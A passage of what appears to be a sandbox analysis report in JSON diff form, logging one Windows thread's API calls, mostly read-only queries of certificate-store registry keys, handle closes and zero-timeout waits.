"0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000598" + }, + { + "name": "ValueName", + "value": "SystemSetupInProgress" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "0" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress" + } + ], + "repeated": 0, + "id": 2134 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74308921", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000598" + } + ], + "repeated": 0, + "id": 2135 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756c7924", + "parentcaller": "0x74308954", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0x00000594" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x00000598" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 2136 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2137 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005a0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates" + } + ], + "repeated": 0, + "id": 2138 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0056a000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2139 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2140 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005a8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root" + } + ], + "repeated": 0, + "id": 2141 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ac" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005a8" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" + } + ], + "repeated": 0, + "id": 2142 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ac" + }, + { + "name": "KeyInformation", + "value": "\\xffa0\\xfff9q%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2143 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005ac" + } + ], + "repeated": 0, + "id": 2144 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ac" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005a8" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\CRLs" + } + ], + "repeated": 0, + "id": 2145 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ac" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2146 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005ac" + } + ], + "repeated": 0, + "id": 2147 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ac" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000005a8" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\CTLs" + } + ], + "repeated": 0, + "id": 2148 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005ac" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2149 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005ac" + } + ], + "repeated": 0, + "id": 2150 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005a8" + } + ], + "repeated": 0, + "id": 2151 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005b4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" + } + ], + "repeated": 0, + "id": 2152 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005b4" + }, + { + "name": "KeyInformation", + "value": "\\xffd2\\x01f%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2153 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005b4" + } + ], + "repeated": 0, + "id": 2154 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005b4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\CRLs" + } + ], + "repeated": 0, + "id": 2155 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005b4" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2156 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005b4" + } + ], + "repeated": 0, + "id": 2157 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005b4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\CTLs" + } + ], + "repeated": 0, + "id": 2158 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005b4" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2159 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005b4" + } + ], + "repeated": 0, + "id": 2160 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005c0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000548" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\Certificates" + } + ], + "repeated": 0, + "id": 2161 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005c0" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2162 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005c0" + } + ], + "repeated": 0, + "id": 2163 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005c0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000548" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CRLs" + } + ], + "repeated": 0, + "id": 2164 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005c0" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2165 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005c0" + } + ], + "repeated": 0, + "id": 2166 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005c0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000548" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CTLs" + } + ], + "repeated": 0, + "id": 2167 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005c0" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2168 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005c0" + } + ], + "repeated": 0, + "id": 2169 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005cc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000550" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\Certificates" + } + ], + "repeated": 0, + "id": 2170 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005cc" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2171 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005cc" + } + ], + "repeated": 0, + "id": 2172 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005cc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000550" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CRLs" + } + ], + "repeated": 0, + "id": 2173 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005cc" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2174 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005cc" + } + ], + "repeated": 0, + "id": 2175 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005cc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000550" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CTLs" + } + ], + "repeated": 0, + "id": 2176 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005cc" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2177 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005cc" + } + ], + "repeated": 0, + "id": 2178 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2179 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000568" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2180 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2181 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2182 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2183 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000580" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2184 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2185 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000058c" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2186 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2187 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005a8" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2188 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2189 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005b4" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2190 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2191 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": 